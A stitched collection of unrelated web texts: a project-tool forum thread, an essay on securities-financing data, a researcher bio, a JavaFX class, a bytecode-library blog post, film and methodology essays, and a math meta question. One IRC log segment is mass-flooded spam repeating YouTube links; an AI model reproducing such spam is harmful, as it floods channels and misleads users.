What about for independent entrepreneur managing multiple clients projects? I could add them all under My Company Team, but since these stakeholders are technically clients, I’ve been creating the projects under their Own Teams to create structure and boundaries. Maybe I answered my own question. By having each client with its own team, I can then add those on my actual team (say hired under my company name) under my Company Team projects, as well organize multiple projects under each of my Client Teams, as I believe in time we’ll grow to such a size. I might have answered my own question! LOL but I am open to feedback here in the community. hehe yes you did answer your own question With clients it really depends on your use case. In our company we also had the problem on how this would be best set up and we have made a lot of changes over the years. In my opinion it really depends what you prefer and how much work per client is involved and how much (if any) access you want your clients to have. yass! i hear ya. I am thinking that as our projects are small and teams are just starting to develop, we can get away with client access within their own teams. I am keen to take a look at your blog about how much access to give them. That was also in the back of my mind. happy to share as things progress. Right now just trying to onboard and immerse people into the teams as most are new to the app. I wonder if there is a great onboarding tutorial here that we can piggy back on?
OPCFW_CODE
Home > Speakers' views Capital market activities (repo, market making…): regulatory impacts and future trends - Economic and monetary challenges Financial Stability Risks in SFTs: Start with the data gaps By Berner Richard - Director, Office of Financial Research, U.S. Department of Treasury After the financial crisis, the Financial Stability Board recommended oversight of securities financing transactions (SFTs), including markets for repos (repurchase agreements), securities lending, and margin lending activities. The crisis revealed three types of vulnerabilities in these markets: (1) leverage and liquidity transformation risks by market intermediaries, (2) weaknesses in the market infrastructure, and (3) the risk of runs and asset fire sales. Regulators have taken important steps to address some of these vulnerabilities, but more remains to be done. For example, no comprehensive mitigant is available for the significant risk of fire sales. In addition, a lack of good data prevents us from adequately monitoring these markets, identifying new trends, and assessing their vulnerabilities. To help address these gaps, the OFR and the U.S. Federal Reserve System launched data collection pilots this past year with input from the U.S. Securities and Exchange Commission. The first pilot, which is complete, focused on the U.S. bilateral repo market. A second, ongoing pilot is focusing on securities lending. Nine large bank holding companies voluntarily provided snapshots of their bilateral repo activity at the end of three reporting days in the first quarter of 2015. Over those days, participating dealers lent an average of $1.6 trillion and borrowed an average of $1 trillion. These trades accounted for about a half of the total U.S. bilateral repo market on those days. We found that about 81 percent of the repo trades and about 61 percent of the reverse repo trades, in which dealers provide cash to their clients, used U.S. government securities as collateral. Equities backed 15 percent of the repo and 21 percent of the reverse repo trades by market value. The OFR recently published a research brief discussing the findings in more detail. The pilot was limited in scope, excluding smaller market participants, cross-border repo activities, and trades outside the United States. For these reasons, the results do not offer a complete picture of market interconnectedness or allow us to track any migration of activities away from the primary dealers that participated in the pilot. On the other hand, the pilot uncovered some key requirements for future data collections. First, common data standards are essential. For example, the lack of standardized counterparty information makes analyzing market interconnectedness difficult for market supervisors and market participants. Although the use of a legal entity identifier (LEI) would help to resolve this issue, the pilot found that adoption of the LEI standard among repo market participants is low. A lack of good data prevents us from assessing their vulnerabilities. Second, participating firms must consistently identify entities by industry sector to assure data quality. Third, the pilot found the need for a consistent and uniform approach to grouping collateral securities to analyze the U.S. SFT market. Fourth, the internal reporting systems of firms in SFT markets should be able to produce granular data at the enterprise level to track risk within the firm and across the financial system. The pilot found that internal systems are disjointed, presenting problems for regulators and the firm’s own risk monitoring efforts. For example, data elements specific to a trade might be kept in one trading system while counterparty data might be kept in a separate system. We will apply these valuable lessons during permanent data collections in collaboration with the Fed, the SEC, and our global counterparts. In these collections, we will require the use of data standards such as LEI. We will also collaborate in other data collection efforts in the United States and Europe. These efforts will be consistent with the principles of in the Financial Stability Board’s multi-year plan on global SFT data collection and aggregation. Our goal is to promote coordination on data standards and cross-border sharing. Success will give us a clearer picture of the global SFT market and developments that may present emerging risks to financial stability.
OPCFW_CODE
Sheng Li is an artificial intelligence researcher and his long-term goal is to develop intelligent systems in open and dynamic environments. Li joined the School of Data Science as an Assistant Professor in 2022. Prior to the University of Virginia, Li was an Assistant Professor of Computer Science at the University of Georgia from 2018 to 2022 and a Data Scientist in Adobe Research from 2017 to 2018. He directs the Reasoning and Knowledge Discovery Laboratory. Li's research interests include trustworthy representation learning (e.g., robustness, fairness, causality, transferability), visual intelligence, user modeling, natural language understanding, bioinformatics, and biomedical informatics. Li has extensive publications in major peer-reviewed journals and conferences. He has served as associate editor of seven journals, including IEEE Transactions on Neural Networks and Learning Systems, IEEE Transactions on Circuits and Systems for Video Technology, and IEEE Computational Intelligence Magazine, and also served as Area Chair for NeurIPS and ICLR. Li holds a Ph.D. in Computer Engineering from Northeastern University, and an M.S. in Information Security and B.S. in Computer Science from Nanjing University of Posts and Telecommunications. Ph.D., Computer Engineering, Northeastern University M.S., Information Security, Nanjing University of Posts and Telecommunications B.S., Computer Science, Nanjing University of Posts and Telecommunications Data Science Domains Areas of Practice Visual Scene Understanding, Bioinformatics, Recommender Systems Data Mining, Machine Learning, Deep Learning Shi, W., Zhu, R., and Li, S. (2022). Pairwise Adversarial Training for Unsupervised Class-imbalanced Domain Adaptation. 28th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining Zhu, R. and Li, S. (2022). CrossMatch: Cross-Classifier Consistency Regularization for Open-Set Single Domain Generalization. International Conference on Learning Representations Rezayi, S., Liu, A., Wu, A., Dhakal, C., Ge, C., Zhen, C., Liu, T., and Li, S. (2022). AgriBERT: Knowledge-Infused Agricultural Language Models for Matching Food and Nutrition. 31st International Joint Conference on Artificial Intelligence Chu, Z., Rathbun, S., and Li, S. (2022). Learning Infomax and Domain-Independent Representations for Causal Effect Inference with Observational Data. SIAM International Conference on Data Mining Taujale, R., Zhou, A., Yeung, W., Moremen, K., Li, S., and Kannan, N. (2021). Mapping the glycosyltransferase fold landscape using interpretable deep learning. Nature Communications, 12, 5656 Sheu, H., Chu, Z., Qi, D., and Li, S. (2021). Knowledge-Guided Article Embedding Refinement for Session-based News Recommendation. IEEE Trans. Neural Networks and Learning Systems Chu, Z., Rathbun, S., and Li, S. (2021). Graph Infomax Adversarial Learning for Treatment Effect Estimation with Networked Observational Data. 27th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining Zhu, R., Tao, Z., Li, Y., and Li, S. (2021). Automated Graph Learning via Population Based Self-Tuning GCN. 42nd International ACM SIGIR Conference on Research and Development in Information Retrieval Jiang, X., Zhu, R., Ji, P., and Li, S. (2020). Co-embedding of Nodes and Edges with Graph Neural Networks. IEEE Trans. Pattern Analysis and Machine Intelligence Li, S., Fu, Y. (2017). Matching on Balanced Nonlinear Representations for Treatment Effects Estimation. 31st Annual Conference on Neural Information Processing Systems Get the latest news Subscribe to receive updates from the School of Data Science.
OPCFW_CODE
[00:41] <myth0d21> https://www.youtube.com/watch?v=ADn2IJnTRyM [00:57] <No> https://www.youtube.com/watch?v=ADn2IJnTRyM [01:12] <nukedclx21> https://www.youtube.com/watch?v=ADn2IJnTRyM [01:41] <gamma7> https://www.youtube.com/watch?v=ADn2IJnTRyM [01:47] <adamg> https://www.youtube.com/watch?v=ADn2IJnTRyM [02:05] <rosseaux27> https://www.youtube.com/watch?v=ADn2IJnTRyM [04:44] <Affliction4> https://www.youtube.com/watch?v=ADn2IJnTRyM [05:11] <ssbr17> https://www.youtube.com/watch?v=ADn2IJnTRyM [05:55] <Checking> https://www.youtube.com/watch?v=ADn2IJnTRyM [07:12] <change23> https://www.youtube.com/watch?v=ADn2IJnTRyM [08:02] <change> https://www.youtube.com/watch?v=ADn2IJnTRyM [08:21] <ascheel12> https://www.youtube.com/watch?v=ADn2IJnTRyM [08:29] <drh11> https://www.youtube.com/watch?v=ADn2IJnTRyM [09:01] <guardian3> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:05] <hubcaps3> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:12] <dirtyroshi> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:15] <elkalamar4> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:19] <thk127> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:23] <mort25> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:37] <apetresc2> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:56] <Death91629> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:10] <CGML7> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:10] <israfel> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:12] <swarfega10> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:17] <Guest7933324> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:26] <Meanderthal4> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:56] <ecks19> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [11:16] <Humbedooh18> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [11:42] <fydel11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [12:22] <spacemud> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [12:35] <Guest249> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [12:50] <L23512> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [13:00] <ktr28> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:06] <funnel22> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:18] <avelardi11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:40] <drot0> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:51] <LewsThanThree11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [15:44] <Xenogenesis26> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [16:03] <shah11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [16:20] <Guest36969> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [17:07] <nosbig23> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [17:44] <was> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [18:23] <brackets> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [19:53] <Krenair11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [20:08] <Davnit25> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [20:35] <deedra13> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [20:38] <atomicthumbs29> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [21:19] <emilsp4> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [22:35] <enyc14> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [22:35] <codex2064> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [22:46] <zeroed> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk
UBUNTU_IRC
package view; import javafx.geometry.Dimension2D; import javafx.geometry.Insets; import javafx.scene.control.Button; import javafx.scene.control.TextArea; import javafx.scene.layout.HBox; import model.Parser; /** * Lower panel containing the text editor that reads in user text input. * @author Callie * */ public class Editor extends HBox { private Button runButton; private TextArea textEditor; private Parser myParser; private SideBar mySidebar; public Editor(Parser parser, SideBar sidebar, Dimension2D dimensions) { mySidebar = sidebar; myParser = parser; setPadding(new Insets(dimensions.getWidth() / 89, 0, dimensions.getWidth() / 85, dimensions.getWidth() / 89)); setSpacing(15); createTextEditor(dimensions); createRunButton(); } private void parse() { String userText = textEditor.getText(); textEditor.clear(); mySidebar.setHistory(userText); myParser.parseAndExecute(userText); } private void createTextEditor(Dimension2D dimensions){ textEditor = new TextArea(); textEditor.setPrefSize(dimensions.getWidth() * .685, dimensions.getHeight() * .095); getChildren().add(textEditor); } private void createRunButton(){ runButton = new Button("Run"); runButton.setMaxWidth(Double.MAX_VALUE); runButton.setMaxHeight(Double.MAX_VALUE); getChildren().add(runButton); runButton.setOnMouseClicked(e -> parse()); } }
STACK_EDU
(Warning: I’m half asleep, and this post is somewhere between a brain dump and a rant. Coherency is strictly optional). So, my latest random personal project has turned into a bit of a debacle. I decided I wanted a Java bytecode manipulation library with a decent Scala API. The options were either “Write my own” or “Write bindings to an existing one”. I chose something of a middle ground: “Port an existing one”. Rather than go for any of the normal big names I went for an obscure little internal library at EPFL called FJBG (Fast Java Bytecode Generator). It’s basically a low level interface onto the classfile format, and I’d used it before for code generation (e.g. for the structural proxies stuff) and found it pretty straightforward. Kindof hard to debug programming errors, but otherwise pretty robust. One slight flaw: No test suite to speak of. But that’s ok, it’s used as part of the compiler backend for scalac, so I assume it gets relatively well covered by the scalac test suite. And it’s been around for quite a while, so has had itme to stabilise. Should be fine. Anyway, the initial porting process went pretty smoothly. I was astonished at how smoothly in fact – after about 6 hours of work I had the bytecode generation code working in Scala and prettified to have nicer method names, etc. Pretty good going. I was frankly astonished – I basically ran it through jatran, spent about 6 hours fixing compiler errors and then at the end it took about 10 minutes of bug fixing before it just worked. Not bad. The only slight problem was that the class file parsing code wasn’t working. The problem was that the way the code worked there was a fairly deeply nested inheritance strategy, and maintained two constructor hierarchies – one for creating things in memory, one for creating them from a DataInputStream. because of the way Scala handles constructors this is essentially impossible to do in Scala. I’ve never thought this was a problem before, but this seemed to me to be quite a reasonable thing to do and I started to have doubts about Scala’s approach to constructors. I still have some, but not to the point that I previously had. The thing is, this approach is really fragile. It means that each constructor needs to balance the class’s invariants in different ways – you’ve given yourself twice as many opportunities to screw up. Anyway, after some struggling with approaches I eventually (took me several times as long as the previous part of the porting) got this ported in a reasonably straightforward way. It wasn’t the prettiest code ever, but the mapping onto the original wasn’t bad. So I tried it out on a few simple tests – generate a class file, read it back in again, compare them to make sure you got approximately the same thing. Hm. And it didn’t work. How curious. I stared at the implementation for a bit, stared at the original Java, couldn’t see a difference. So I ran the same test on the original Java and it broke in the same way. Great. That turned out to be an easy fix. But it was an easy fix to a problem very definitely caused by the multiple constructor hierarchy. Oh well, that worked now. Next part of the test. Write the newly read class file to a file, load it and try to run it. Oops. It NPEs when I try to write the file. Guess I did something wrong – I wonder why that array is null there. Looks like the logic for initialising it is rather complex, lets see how the original Java version handles this. So I wrote a simplified test case using the original which took a class file, read it to the in memory representation and wrote it out again and tested it against a random class file. It broke. In a totally different way to the way my version did – it didn’t even manage to read the file (I think the difference here is that this was a classfile found in the wild rather than one generated by FJBG). Tried it on a different, simpler one – Specifically the class generated by the obvious HelloWorld.java. That broke too. So at this point I was forced to conclude that the class file reading code in FJBG just didn’t work at all. What the hell? Wasn’t this used in the Scala compiler? Clearly it has to be able to parse class files in order to know what’s available on the classpath to compile against! So, some digging through the compiler source later: scalac doesn’t use FJBG’s class reading code at all. It has its own entirely separate code for that. So this code which I thought was part of a fairly mature and robust compiler backend was in fact completely and utterly untested and unused. No wonder it was broken. So, new rule (to many of you, a very old rule): If it’s library code and it’s not tested, it’s broken. An application you can judge by “Does it do the right thing?” to at least get some sense of how not broken it is. Besides, I only have to use it, no code against it. But if my code is going to depend on yours, yours better be tested. I’m usually pretty bad at tests actually. Applications I’ve written are certainly woefully undertested. SBinary’s tests are… well, adequate. And I don’t really recommend depending on any other libraries I’ve written – they’re all a bit incomplete and half assed. :-) Hopefully this will teach me to be better. At this point I was already rather upset with FJBG’s object model – too mutable, too many back references. So on top of fixing the reading code I was going to have to fix that. At this point I decided that it was time to cut my losses, so I’m going to go back to option 1: Write my own. I’ll certainly reuse what I can salvage from the FJBG code (assuming some worries I have about licensing are resolved), but honestly the class file format is pretty easy. The overarching format took me two hours to write a parser for (I did it the same night as discovering that . The bytecode format for method bodies is harder, but I expect to be able to reuse FJBG code for this bit (and probably write a fair bit of my own). Anyway, hopefully this will turn out to be a good thing and I’ll end up with something much more scalic than a straight port of FJBG would have been. We’ll see. Watch this space to see if anything comes of this, and watch this repo to keep an eye on the code.
OPCFW_CODE
Was Ra's al Ghul nearly immortal in the Dark Knight trilogy? The character of Ra's al Ghul is considered "nearly immortal" in the DC universe. He is nearly immortal because he can cheat death due to the powers of the Lazarus pit. This allows Ra's al Ghul to possess longevity, rejuvenation and youth restoration abilities. However, he can still be killed like any mortal. Is there any evidence that Ra's al Ghul was nearly immortal in the The Dark Knight trilogy? Congratulations, this question is the winner of the corresponding topic challenge. Well, yes and no. There is no clear evidence that he is or is not nearly immortal. We don't actually see him die at the end of Batman Begins, neither is any kind of Lazarus pit nor its absence ever mentioned in the movie. However, there is a strong argument to be made that he is just a normal mortal person like you and me (bar any "normal" kind of better physique due to extensive training achievable by any properly trained soldier). The Nolan Batman films go to great lengths to root the whole Batman universe in a somewhat real-life scenario, where all of this could actually happen. There is stuff that's at least stretching plausibility, like advanced hightech gadgetry or the fact of someone even deciding to be such a masked vigilante. But the films themselves, their story and their whole presentation are much more rooted in the genre of the crime drama, than the one of comic superheroes. So, in the same way a Bane powered by some kind of super-soldier serum would be too much for that, a concept of a literal Lazarus pit might not fit very well there, too. However, I deliberately said "literal", because the Nolan films, in their effort to root the ultimately comics-based Batman universe in the world of realistic crime-thrillers go to great lengths to actually transfer some of the well-known but maybe too weird concepts of the source material from their literal origins into a much more metaphorical meaning. For example, the pit where Bruce Wayne is imprisoned in the last film and that cures both his physical and psychological issues could be seen as a reference to the actual Lazarus pit, while still not being as otherworldly. Or Bane's mask that doesn't pump some weird super-soldier serum into his body, but instead makes him suspectible to much higher pain-levels than normal people by constantly delivering pain-killers to him. And one of those instances is the immortality of Ra's al Ghul, which is repeatedly adressed throughout the film series. Just that it's not an actual literal immortality, rather than a metaphorical immortality of Ra's al Ghul and the League of Shadow's ideas. When we repeatedly see his ideology come back for Gotham through Bane or Talia, or when Bruce imagines Ra's himself in his ultimate realization in the pit. Realistically, it only is Bruce halucinating, but symbolically it is Ra's al Ghul coming back from the dead to haunt him. Ra's is very much dead, his legacy might never be. Including the concept of a literal Lazarus pit bringing his body back from the dead would undermine this whole concept. In fact this somehow immortality while not actually being immortal is adressed in Batman Begins already, when it is revealed that Henri Ducard is Ra's al Ghul himself (rather than Ken Watanabe as we previously thought), a mere symbol he made for his ideas in the same way Bruce created a symbol to inspire Gotham city (and one that ultimately will stay immortal too): Bruce: You're not Ra's al Ghul. I watched him die. Ducard: But is Ra's al Ghul immortal? Are his methods supernatural? Bruce: Or cheap parlor tricks to conceal your true identity, Ra's? Ra's himself (or Bruce's projection of him) even alludes to his different kind of immortality in the pit scene in The Dark Knight Rises: Ra's: Tsk, tsk, tsk. Did you not think l would return, Bruce? Hmm? I told you I was immortal. Bruce: I watched...I watched you die. Ra's: Oh, there are many forms of immortality. Despite us not seeing him die, Bruce does say he did see him. We just didn't for cinematic reasons. If we take Bruce's word, we can conclude he is in fact not immortal. @BlueMoon93 Good point. But then again, I don't think Bruce really saw more than we did (him standing in a train that crashed and exploded seconds later) and is probably just extrapolating as much as we do.
STACK_EXCHANGE
Agile vs. Waterfall One of the first decisions any software development project faces, is the “Which development methodology should we use?” question. This is a topic that gets lots of discussions and often very heated debate! The two most popular methodologies currently used are: Both of these are usable and mature methodologies. Having been involved in software development projects for a long time, here are my thoughts on the strengths and weaknesses of each. The Waterfall Methodology Waterfall is a linear approach to software development. In this methodology, the sequence of events is something like: • Gather and document requirements • Code and unit test • Perform system testing • Perform user acceptance testing (UAT) • Fix any issues • Deliver the finished product In a true Waterfall development project, each of these represents a distinct stage of software development, and each stage generally finishes before the next one can begin. There is also typically a stage gate between each; for example, requirements must be reviewed and approved by the customer before design can begin. There are good things and bad about the Waterfall approach. On the positive side: • Developers and customers agree on what will be delivered early in the development lifecycle. This makes planning and designing more straightforward. • Progress is more easily measured, as the full scope of the work is known in advance. • Throughout the development effort, it’s possible for various members of the team to be involved or to continue with other work, depending on the active phase of the project. For example, business analysts can learn about and document what needs to be done, while the developers are working on other projects. Testers can prepare test scripts from requirements documentation while coding is underway. • Except for reviews, approvals, status meetings, etc., a customer presence is not strictly required after the requirements phase. • Because design is completed early in the development lifecycle, this approach lends itself to projects where multiple software components must be designed (sometimes in parallel) for integration with external systems. • Finally, the software can be designed completely and more carefully, based upon a more complete understanding of all software deliverables. This provides a better software design with less likelihood of the “piecemeal effect,” a development phenomenon that can occur as pieces of code are defined and subsequently added to an application where they may or may not fit well. Here are some issues I have encountered using a pure Waterfall approach: • One area which almost always falls short is the effectiveness of requirements. Gathering and documenting requirements in a way that is meaningful to a customer is often the most difficult part of software development, in my opinion. Customers are sometimes intimidated by the complexity and specification details, provided early in the project, are required with this approach. In addition, customers are not always able to visualize an application from a requirements document. Wireframes and mockups can help, but there’s no question that most end users have some difficulty putting these elements together with written requirements to arrive at a good picture of what they will be getting. • Another potential drawback of pure Waterfall development is the possibility that the customer will be dissatisfied with their delivered software product. As all deliverables are based upon documented requirements, a customer may not see what will be delivered until it’s almost finished. By that time, changes can be difficult (and costly) to implement. The Agile Methodology Agile is an iterative, team-based approach to development. This approach emphasizes the rapid delivery of an application with complete functional components. Rather than creating tasks and schedules, all time is “time-boxed” into phases called “sprints.” Each sprint has a defined duration (usually in weeks) with a running list of deliverables, planned at the start of the sprint. Deliverables are prioritized by business value as determined by the customer. If all planned work for the sprint cannot be completed, work is reprioritized and the information is used for future sprint planning. As work is completed, it can be reviewed and evaluated by the project team and customer, through daily builds and end-of-sprint demos. Agile relies on a very high level of customer involvement throughout the project, but especially during these reviews. Some advantages of the Agile approach are easy to see: • The customer has frequent and early opportunities to see the work being delivered and to make decisions and changes throughout the development project. • The customer gains a strong sense of ownership by working extensively and directly with the project team throughout the project. • If time-to-market for a specific application is a greater concern than releasing a full feature set at initial launch, Agile can more quickly produce a basic version of working software which can be built upon in successive iterations. • Development is often more user-focused, likely a result of more and frequent direction from the customer. And, of course, there are some disadvantages: • The very high degree of customer involvement, while great for the project, may present problems for some customers who simply may not have the time or interest for this type of participation. • Agile works best when members of the development team are completely dedicated to the project. • Because Agile focuses on time-boxed delivery and frequent reprioritization, it’s possible that some items set for delivery will not be completed within the allotted timeframe. Additional sprints (beyond those initially planned) may be needed, adding to the project cost. In addition, customer involvement often leads to additional features requested throughout the project. Again, this can add to the overall time and cost of the implementation. • The close working relationships in an Agile project are easiest to manage when the team members are located in the same physical space, which is not always possible. However, there are a variety of ways to handle this issue, such as webcams, collaboration tools, etc. • The iterative nature of Agile development may lead to a frequent refactoring if the full scope of the system is not considered in the initial architecture and design. Without this refactoring, the system can suffer from a reduction in overall quality. This becomes more pronounced in larger-scale implementations, or with systems that include a high level of integration. Making the Choice Between Agile and Waterfall So, how do we choose? We consider the following factors when considering which methodology to use: The factors above are not equally weighted, thus each should be assessed depending on the individual project and circumstances. Once you have decided which basic methodology to utilise, you can further refine the process to best fit your project goals. Ultimately, although the way in which you do your work is important, delivering a solid and maintainable product that satisfies the customer is what really counts. Beck, K et.al (2001). ‘The Agile Manifesto’, AgileManifesto [Online]. Available at http://agilemanifesto.org/principles.html (Accessed Nov. 2016). Górski J. and Łukasiewicz, K. (2013). ‘Towards Agile Development of Critical Software BT – Software Engineering for Resilient Systems: 5th International Workshop’, SERENE 2013, Kiev, Ukraine, October 3-4, 2013. Proceedings. In A. Gorbenko, A. Romanovsky, & V. Kharchenko (Eds.) (pp. 48–55). Berlin, Heidelberg: Springer Berlin Heidelberg. Available at http://link.springer.com.libezproxy.open.ac.uk/chapter/10.1007/978-3-642-40894-6_4 (Accessed Nov. 2016). Jézéquel J.M. (2014). ‘Model-Driven Engineering for Software Product Lines’, Model-Driven Engineering of Information Systems (pp. 51–110). Apple Academic Press [Online]. Available at http://www.crcnetbase.com.libezproxy.open.ac.uk/doi/pdf/10.1201/b17480-4 (Accessed Nov. 2016). Mellor S.K, Clark A.N. and Futagami T. (2003). ‘Model-driven development – Guest editor’s introduction,’ IEEE Software, vol. 20, no. 5, pp. 14-18, Sept.-Oct. 2003. [Online]. Available at http://ieeexplore.ieee.org.libezproxy.open.ac.uk/stamp/stamp.jsp?arnumber=1231145 (Accessed Nov. 2016). Schmidt. D (2006). ‘Model-Driven Engineering’, IEEE Computer, Vol. 39, No. 2, February 2006, pp. 41-47. Available at http://www.dre.vanderbilt.edu/~schmidt/PDF/GEI.pdf (Accessed Nov. 2016). Unhelkar, B (2012). ‘The Art of Agile Practice’, Auerbach Publications, pp 71-96 [Online]. Available at http://www.crcnetbase.com.libezproxy.open.ac.uk/doi/pdf/10.1201/b13085-5 (Accessed Nov. 2016).
OPCFW_CODE
There are several advantages to presenting your study at a conference. Students who have presented at conferences report learning a great deal from others’ research, establishing valuable connections through networking, preparing for graduate school, and displaying their job to the public, among other things. The conference is a great way to network with peers on the same research topic. Participants are able to learn from other researchers who are sharing their work. There is a chance to meet others in the same field and share ideas, research papers and papers that they have written. It is also a great place to network with colleagues in other fields. Correspondence between researchers at conferences can be very helpful for them as well as their readers. They may be able to get advice on how they can make improvements or suggestions for new research topics, provide access to manuscripts and/or reviewers, and possibly even publish your work if you were successful at the conference. There are also benefits associated with participating in conferences: These benefits are not limited to academic conferences. Some researchers may find that attending conferences is a way to: There is no set attendance at a conference and participants may attend events of their choosing. There are several ways that you can do this: There are two types of conferences: as part of an academic program or as a way for researchers to organize themselves. Academic programs typically have more members than non-academic programs, but they all share the same basic goals: to provide opportunities for the exchange of ideas, inform each other about the latest research developments, and learn from each other’s work. Non-academic programs may have more members but they do not share the same goals. Non-academic conferences may present an opportunity for researchers to meet new people, discuss research issues and share ideas and perspectives with each other as well as with their colleagues in other fields. Academic conferences are open to all types of people including faculty who teach in both undergraduate and graduate schools, students from different departments in one university, alumni from all levels of academia or industry and others who simply want to meet people outside their field. They are often held on a regular schedule so that participants can attend multiple times per year if desired by organizers. Many academic conferences also feature networking events with guest speakers from different fields such as business communications, neuroscience and psychology; this is an excellent opportunity for you to network with peers in your field. Non-academic conference organizers often use a variety of methods to ensure that their conference is a safe space for all participants and that there will be no bias or discrimination based on any aspect of race, gender, sexual orientation, religion or any other characteristic. Non-academic conferences promote diversity by including a wide range of speakers and exhibitors from different areas of science and technology. Non-academic conferences are typically held in the same location where academic conferences are held, so that attendees can easily attend in the same building as researchers from all over the world. Non-academic conferences may include speakers from all sides of the spectrum: The purpose of an academic conference is to promote research and education. It is important for researchers to have a voice in those activities. It is also important for scientists to have access to the information they need in order to pursue their goals with enthusiasm and productivity. Academic conferences allow researchers to interact with others outside their field who share similar research interests and similar goals; this may include visiting colleagues at other universities or companies so that they can exchange ideas and perspectives on how research can be improved. Academic conferences also encourage people within various disciplines, such as computer science or physics, to meet with each other because they share common interests in some aspect of science and technology or philosophy based on their field of study or interest. Non-academic conferences provide an excellent opportunity for you to meet people who share important scientific interests but do not necessarily share your own interests; this allows you a chance to connect with people who might be able to help you better understand your research.
OPCFW_CODE
Tagging Answers? Simple question: should the tagging of a question cover answers? Suppose I asked a question about a mathematical problem and in the answers contained for example: pointers to literature algorithms examples counterexamples $\cdots$ should the tagging of the question be updated to cover what is in the (correct) answers, resp. is it already or should it be possible to tag questions directly? Just to clarify, is this only about "meta tags" (such as reference-request or counterexamples) or also about tags with actual mathematical content. (For example, are you also asking whether if after an answers is posted it becomes clear that the question is related to infinitary combinatorics and in the question the relation to this are is not clear, then the corresponding tag should be given.) @MartinSleziak it is primarily about metatags, but if the answer exhibits connections to other areas of mathematics, I would also think that adding those tags could be helpful. I will mention that there were some related discussions on other metas (although not primarily about meta tags - if I may use that name). Here are examples from Mathematics Meta and Meta Stack Exchange: Retagging after an answer is given, Should I retag a question with a tag that is based on the answer and not the question? and Should we retag questions with topics proposed in the answers? The meta-tags (counter)examples and reference-request sound to me of limited interest: the first is often completely useless (applies to too many questions); the second at least has the role of saying that the primary intention of the OP is to get references, rather than, say, a proof/construction. So this utility would not apply to mean that an answer provides a reference. "algorithm" is another problem (whether is should be called a meta-tag is questionable). In the case of meta-tags my opinion to your question is clearly no: completely useless. On the other hand adding a mathematical tag because an answer shows a connection unexpected by the OP (e.g., adding "lo.logic" because one realizes that many people in logic have thought about the question, etc) has the effect of making the post visible to potentially interested users and therefore can be a good idea. @YCor contrary to your opinion, I don't believe that metatags for answers are completely useless if one has the idea of scrutinizing MO for interesting algorithms, examples, counterexamples, etc. Such searches will be more effective, if it is possible to tell that it is in the answers or if the OP was looking for it. In a nutshell the metatags in answers would provide search keys for improved database functionality. @ManfredWeis I didn't claim "algorithm" is useless, about it I only said it's not clear that it's a meta-tag. Concerning examples/counterexamples (which are essentially equivalent), there are 410+115 questions with such tags... it's probably less that 10% than the number of actual questions asking for an example of something.
STACK_EXCHANGE
